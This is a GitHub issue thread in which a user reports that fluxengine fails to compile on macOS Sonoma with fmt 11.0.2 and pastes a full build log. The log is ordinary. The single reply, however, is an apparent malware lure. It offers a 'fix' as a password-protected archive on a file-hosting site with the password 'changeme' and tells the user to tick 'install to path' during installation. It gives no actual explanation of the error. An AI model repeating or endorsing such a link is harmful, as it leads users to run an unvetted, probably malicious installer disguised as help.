### ISSUE TITLE
Can't compile on Mac OSX Sonoma 14.6.1 

### ISSUE THREAD

**Issue by 16bitgium** [davidgiven/fluxengine#765]
Hi,

I got the following error while trying to compile:
/opt/homebrew/Cellar/fmt/11.0.2/include/fmt/base.h:1402:20: error: 'this' argument to member function 'format' has type 'const fmt::formatter<Sector::Status>', but function is not marked const
    ctx.advance_to(cf.format(*static_cast<qualified_type*>(arg), ctx));

thomas@Thomass-MacBook-Air-2 fluxengine % gmake 
AB
loading build.py
loading build/c.py
loading build/protobuf.py
loading build/pkg.py
loading build/utils.py
loading config.py
fluxengine-testdata not found; skipping corpus tests
loading src/build.py
loading dep/fmt/build.py
loading dep/adflib/build.py
loading dep/agg/build.py
loading dep/fatfs/build.py
loading dep/hfsutils/build.py
loading dep/libusbp/build.py
loading dep/stb/build.py
loading lib/build.py
loading arch/build.py
loading src/formats/build.py
loading scripts/build.py
loading tests/build.py
loading src/gui/build.py
loading extras/build.py
loading src/gui/drivetypes/build.py
loading tools/build.py
loading dep/snowhouse/build.py
PROTOCC +fl2_proto_lib_srcs
CHEADERS +fl2_proto_lib_hdrs
CXX +fl2_proto_lib/+fl2_proto_lib_srcs/lib/fl2.pb.cc
LIB +fl2_proto_lib
CHEADERS +protocol
CHEADERS dep/adflib/+adflib_hdrs
CC dep/adflib/+adflib/dep/adflib/src/adf_bitm.c
CC dep/adflib/+adflib/dep/adflib/src/adf_cache.c
CC dep/adflib/+adflib/dep/adflib/src/adf_dir.c
CC dep/adflib/+adflib/dep/adflib/src/adf_disk.c
CC dep/adflib/+adflib/dep/adflib/src/adf_dump.c
CC dep/adflib/+adflib/dep/adflib/src/adf_env.c
CC dep/adflib/+adflib/dep/adflib/src/adf_file.c
CC dep/adflib/+adflib/dep/adflib/src/adf_hd.c
CC dep/adflib/+adflib/dep/adflib/src/adf_link.c
CC dep/adflib/+adflib/dep/adflib/src/adf_raw.c
CC dep/adflib/+adflib/dep/adflib/src/adf_salv.c
CC dep/adflib/+adflib/dep/adflib/src/adf_util.c
LIB dep/adflib/+adflib
CHEADERS dep/agg/+agg_hdrs
CXX dep/agg/+agg/dep/agg/src/agg_arrowhead.cpp
CXX dep/agg/+agg/dep/agg/src/agg_line_aa_basics.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_bspline.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vpgen_segmentator.cpp
CXX dep/agg/+agg/dep/agg/src/agg_color_rgba.cpp
CXX dep/agg/+agg/dep/agg/src/agg_sqrt_tables.cpp
CXX dep/agg/+agg/dep/agg/src/agg_bspline.cpp
CXX dep/agg/+agg/dep/agg/src/agg_curves.cpp
CXX dep/agg/+agg/dep/agg/src/agg_rounded_rect.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_markers_term.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_dash.cpp
CXX dep/agg/+agg/dep/agg/src/agg2d.cpp
CXX dep/agg/+agg/dep/agg/src/agg_trans_affine.cpp
CXX dep/agg/+agg/dep/agg/src/agg_gsv_text.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_smooth_poly1.cpp
CXX dep/agg/+agg/dep/agg/src/agg_trans_single_path.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vpgen_clip_polygon.cpp
CXX dep/agg/+agg/dep/agg/src/agg_embedded_raster_fonts.cpp
CXX dep/agg/+agg/dep/agg/src/agg_trans_double_path.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_stroke.cpp
CXX dep/agg/+agg/dep/agg/src/agg_arc.cpp
CXX dep/agg/+agg/dep/agg/src/agg_image_filters.cpp
CXX dep/agg/+agg/dep/agg/src/agg_trans_warp_magnifier.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vpgen_clip_polyline.cpp
CXX dep/agg/+agg/dep/agg/src/agg_bezier_arc.cpp
CXX dep/agg/+agg/dep/agg/src/agg_line_profile_aa.cpp
CXX dep/agg/+agg/dep/agg/src/agg_vcgen_contour.cpp
LIB dep/agg/+agg
CHEADERS dep/fatfs/+fatfs_hdrs
CC dep/fatfs/+fatfs/dep/fatfs/source/ff.c
dep/fatfs/source/ff.c:2440:59: warning: passing 'BYTE *' (aka 'unsigned char *') to parameter of type 'const char *' converts between pointers to integer types where one is of the unique plain 'char' type and the other is not [-Wpointer-sign]
                if (!(dp->dir[DIR_Attr] & AM_VOL) && !compare_filenames(dp->dir, dp->fn, 11)) break;    /* Is it a valid entry? */
                                                                        ^~~~~~~
dep/fatfs/source/ff.c:2353:42: note: passing argument to parameter 's1' here
static int compare_filenames(const char* s1, const char* s2, size_t n)
                                         ^
dep/fatfs/source/ff.c:2440:68: warning: passing 'BYTE[12]' (aka 'unsigned char[12]') to parameter of type 'const char *' converts between pointers to integer types where one is of the unique plain 'char' type and the other is not [-Wpointer-sign]
                if (!(dp->dir[DIR_Attr] & AM_VOL) && !compare_filenames(dp->dir, dp->fn, 11)) break;    /* Is it a valid entry? */
                                                                                 ^~~~~~
dep/fatfs/source/ff.c:2353:58: note: passing argument to parameter 's2' here
static int compare_filenames(const char* s1, const char* s2, size_t n)
                                                         ^
2 warnings generated.
CC dep/fatfs/+fatfs/dep/fatfs/source/ffsystem.c
CC dep/fatfs/+fatfs/dep/fatfs/source/ffunicode.c
LIB dep/fatfs/+fatfs
CHEADERS dep/hfsutils/+hfsutils_hdrs
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/block.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/btree.c
dep/hfsutils/libhfs/btree.c:444:32: warning: passing 'int *' to parameter of type 'unsigned int *' converts between pointers to integer types with different sign [-Wpointer-sign]
        result = n_insert(np, record, reclen);
                                      ^~~~~~
dep/hfsutils/libhfs/node.h:32:44: note: passing argument to parameter here
int n_insert(node *, byte *, unsigned int *);
                                           ^
dep/hfsutils/libhfs/btree.c:449:37: warning: passing 'int *' to parameter of type 'unsigned int *' converts between pointers to integer types with different sign [-Wpointer-sign]
      result = n_insert(np, record, reclen);
                                    ^~~~~~
dep/hfsutils/libhfs/node.h:32:44: note: passing argument to parameter here
int n_insert(node *, byte *, unsigned int *);
                                           ^
dep/hfsutils/libhfs/btree.c:493:30: warning: passing 'unsigned int *' to parameter of type 'int *' converts between pointers to integer types with different sign [-Wpointer-sign]
  if (insertx(&root, newrec, &reclen) == -1)
                             ^~~~~~~
dep/hfsutils/libhfs/btree.c:412:42: note: passing argument to parameter 'reclen' here
int insertx(node *np, byte *record, int *reclen)
                                         ^
3 warnings generated.
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/data.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/file.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/hfs.c
dep/hfsutils/libhfs/hfs.c:672:45: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
  found = v_resolve(&vol, path, &file->cat, &parid, name, 0);
                                            ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:743:41: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
  if (v_resolve(&vol, path, &file->cat, &file->parid, file->name, 0) <= 0)
                                        ^~~~~~~~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1037:36: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
      v_resolve(&vol, path, &data, &parid, name, 0) <= 0)
                                   ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1116:40: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
  found = v_resolve(&vol, path, &data, &parid, name, 0);
                                       ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1148:36: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
      v_resolve(&vol, path, &data, &parid, name, 0) <= 0)
                                   ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1198:40: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
      v_resolve(&vol, path, &file.cat, &file.parid, file.name, 0) <= 0)
                                       ^~~~~~~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1273:38: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
      v_resolve(&vol, srcpath, &src, &srcid, srcname, 0) <= 0)
                                     ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
dep/hfsutils/libhfs/hfs.c:1279:42: warning: passing 'unsigned long *' to parameter of type 'long *' converts between pointers to integer types with different sign [-Wpointer-sign]
  found = v_resolve(&vol, dstpath, &dst, &dstid, dstname, 0);
                                         ^~~~~~
dep/hfsutils/libhfs/volume.h:57:60: note: passing argument to parameter here
int v_resolve(hfsvol **, const char *, CatDataRec *, long *, char *, node *);
                                                           ^
8 warnings generated.
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/low.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/medium.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/memcmp.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/node.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/record.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/version.c
CC dep/hfsutils/+hfsutils/dep/hfsutils/libhfs/volume.c
LIB dep/hfsutils/+hfsutils
CHEADERS dep/libusbp/+libusbp_hdrs
CC dep/libusbp/+libusbp/dep/libusbp/src/async_in_pipe.c
CC dep/libusbp/+libusbp/dep/libusbp/src/error.c
CC dep/libusbp/+libusbp/dep/libusbp/src/error_hresult.c
CC dep/libusbp/+libusbp/dep/libusbp/src/find_device.c
CC dep/libusbp/+libusbp/dep/libusbp/src/list.c
CC dep/libusbp/+libusbp/dep/libusbp/src/pipe_id.c
CC dep/libusbp/+libusbp/dep/libusbp/src/string.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/async_in_transfer_mac.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/device_mac.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/error_mac.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/generic_handle_mac.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/generic_interface_mac.c
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/iokit_mac.c
dep/libusbp/src/mac/iokit_mac.c:22:44: warning: 'kIOMasterPortDefault' is deprecated: first deprecated in macOS 12.0 [-Wdeprecated-declarations]
    *service = IOServiceGetMatchingService(kIOMasterPortDefault, dict);
                                           ^~~~~~~~~~~~~~~~~~~~
                                           kIOMainPortDefault
/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/System/Library/Frameworks/IOKit.framework/Headers/IOKitLib.h:133:19: note: 'kIOMasterPortDefault' has been explicitly marked deprecated here
const mach_port_t kIOMasterPortDefault
                  ^
1 warning generated.
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/list_mac.c
dep/libusbp/src/mac/list_mac.c:56:13: warning: 'kIOMasterPortDefault' is deprecated: first deprecated in macOS 12.0 [-Wdeprecated-declarations]
            kIOMasterPortDefault, dict, &iterator);
            ^~~~~~~~~~~~~~~~~~~~
            kIOMainPortDefault
/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/System/Library/Frameworks/IOKit.framework/Headers/IOKitLib.h:133:19: note: 'kIOMasterPortDefault' has been explicitly marked deprecated here
const mach_port_t kIOMasterPortDefault
                  ^
1 warning generated.
CC dep/libusbp/+libusbp/dep/libusbp/src/mac/serial_port_mac.c
LIB dep/libusbp/+libusbp
CHEADERS dep/stb/+stb_hdrs
CC dep/stb/+stb/dep/stb/stb_image_write.c
LIB dep/stb/+stb
PROTOCC lib/+config_proto_lib_srcs
CHEADERS lib/+config_proto_lib_hdrs
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/common.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/config.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/layout.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/drive.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/decoders/decoders.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/encoders/encoders.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/fluxsink/fluxsink.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/fluxsource/fluxsource.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/imagereader/imagereader.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/imagewriter/imagewriter.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/usb/usb.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/vfs/vfs.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/lib/fl2.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/aeslanier/aeslanier.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/agat/agat.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/amiga/amiga.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/apple2/apple2.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/brother/brother.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/c64/c64.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/f85/f85.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/fb100/fb100.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/ibm/ibm.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/macintosh/macintosh.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/micropolis/micropolis.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/mx/mx.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/northstar/northstar.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/rolandd20/rolandd20.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/smaky6/smaky6.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/tartu/tartu.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/tids990/tids990.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/victor9k/victor9k.pb.cc
CXX lib/+config_proto_lib/lib/+config_proto_lib_srcs/arch/zilogmcz/zilogmcz.pb.cc
LIB lib/+config_proto_lib
CHEADERS +lib_hdrs
CXX +lib/lib/bitmap.cc
CXX +lib/lib/bytes.cc
CXX +lib/lib/config.cc
CXX +lib/lib/crc.cc
CXX +lib/lib/csvreader.cc
CXX +lib/lib/decoders/decoders.cc
CXX +lib/lib/decoders/fluxdecoder.cc
CXX +lib/lib/decoders/fluxmapreader.cc
CXX +lib/lib/decoders/fmmfm.cc
CXX +lib/lib/encoders/encoders.cc
CXX +lib/lib/fl2.cc
CXX +lib/lib/flags.cc
CXX +lib/lib/fluxmap.cc
CXX +lib/lib/fluxsink/a2rfluxsink.cc
CXX +lib/lib/fluxsink/aufluxsink.cc
CXX +lib/lib/fluxsink/fl2fluxsink.cc
CXX +lib/lib/fluxsink/fluxsink.cc
CXX +lib/lib/fluxsink/hardwarefluxsink.cc
CXX +lib/lib/fluxsink/scpfluxsink.cc
CXX +lib/lib/fluxsink/vcdfluxsink.cc
CXX +lib/lib/fluxsource/a2rfluxsource.cc
CXX +lib/lib/fluxsource/catweasel.cc
CXX +lib/lib/fluxsource/cwffluxsource.cc
CXX +lib/lib/fluxsource/dmkfluxsource.cc
CXX +lib/lib/fluxsource/erasefluxsource.cc
CXX +lib/lib/fluxsource/fl2fluxsource.cc
CXX +lib/lib/fluxsource/fluxsource.cc
CXX +lib/lib/fluxsource/flx.cc
CXX +lib/lib/fluxsource/flxfluxsource.cc
CXX +lib/lib/fluxsource/hardwarefluxsource.cc
CXX +lib/lib/fluxsource/kryoflux.cc
CXX +lib/lib/fluxsource/kryofluxfluxsource.cc
CXX +lib/lib/fluxsource/memoryfluxsource.cc
CXX +lib/lib/fluxsource/scpfluxsource.cc
CXX +lib/lib/fluxsource/testpatternfluxsource.cc
CXX +lib/lib/globals.cc
CXX +lib/lib/hexdump.cc
CXX +lib/lib/image.cc
CXX +lib/lib/imagereader/d64imagereader.cc
CXX +lib/lib/imagereader/d88imagereader.cc
CXX +lib/lib/imagereader/dimimagereader.cc
CXX +lib/lib/imagereader/diskcopyimagereader.cc
CXX +lib/lib/imagereader/fdiimagereader.cc
CXX +lib/lib/imagereader/imagereader.cc
CXX +lib/lib/imagereader/imdimagereader.cc
CXX +lib/lib/imagereader/imgimagereader.cc
CXX +lib/lib/imagereader/jv3imagereader.cc
CXX +lib/lib/imagereader/nfdimagereader.cc
CXX +lib/lib/imagereader/nsiimagereader.cc
CXX +lib/lib/imagereader/td0imagereader.cc
CXX +lib/lib/imagewriter/d64imagewriter.cc
CXX +lib/lib/imagewriter/d88imagewriter.cc
CXX +lib/lib/imagewriter/diskcopyimagewriter.cc
CXX +lib/lib/imagewriter/imagewriter.cc
CXX +lib/lib/imagewriter/imdimagewriter.cc
CXX +lib/lib/imagewriter/imgimagewriter.cc
CXX +lib/lib/imagewriter/ldbsimagewriter.cc
CXX +lib/lib/imagewriter/nsiimagewriter.cc
CXX +lib/lib/imagewriter/rawimagewriter.cc
CXX +lib/lib/layout.cc
lib/layout.cc:15:21: warning: enumeration value 'DRIVETYPE_UNKNOWN' not handled in switch [-Wswitch]
            switch (drive_type)
                    ^~~~~~~~~~
lib/layout.cc:15:21: note: add missing switch cases
            switch (drive_type)
                    ^
lib/layout.cc:28:21: warning: enumeration value 'DRIVETYPE_UNKNOWN' not handled in switch [-Wswitch]
            switch (drive_type)
                    ^~~~~~~~~~
lib/layout.cc:28:21: note: add missing switch cases
            switch (drive_type)
                    ^
lib/layout.cc:12:13: warning: enumeration value 'FORMATTYPE_UNKNOWN' not handled in switch [-Wswitch]
    switch (format_type)
            ^~~~~~~~~~~
lib/layout.cc:12:13: note: add missing switch cases
    switch (format_type)
            ^
3 warnings generated.
CXX +lib/lib/ldbs.cc
CXX +lib/lib/logger.cc
CXX +lib/lib/proto.cc
CXX +lib/lib/readerwriter.cc
CXX +lib/lib/sector.cc
In file included from lib/sector.cc:1:
In file included from .obj//+lib_hdrs/lib/globals.h:19:
In file included from /opt/homebrew/Cellar/fmt/11.0.2/include/fmt/format.h:41:
/opt/homebrew/Cellar/fmt/11.0.2/include/fmt/base.h:1402:20: error: 'this' argument to member function 'format' has type 'const fmt::formatter<Sector::Status>', but function is not marked const
    ctx.advance_to(cf.format(*static_cast<qualified_type*>(arg), ctx));
                   ^~
/opt/homebrew/Cellar/fmt/11.0.2/include/fmt/base.h:1383:21: note: in instantiation of function template specialization 'fmt::detail::value<fmt::context>::format_custom_arg<Sector::Status, fmt::formatter<Sector::Status>>' requested here
    custom.format = format_custom_arg<
                    ^
/opt/homebrew/Cellar/fmt/11.0.2/include/fmt/base.h:1647:10: note: in instantiation of function template specialization 'fmt::detail::value<fmt::context>::value<Sector::Status>' requested here
  return {arg_mapper<Context>().map(val)};
         ^
lib/sector.cc:35:25: note: in instantiation of function template specialization 'fmt::format<Sector::Status &>' requested here
            return fmt::format("unknown error {}", status);
                        ^
.obj//+lib_hdrs/lib/sector.h:96:10: note: 'format' declared here
    auto format(Sector::Status status, format_context& ctx)
         ^
1 error generated.
gmake: *** [.obj//build.mk:3121: .obj//.sentinels/+lib/lib/sector.cc.mark] Error 1

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
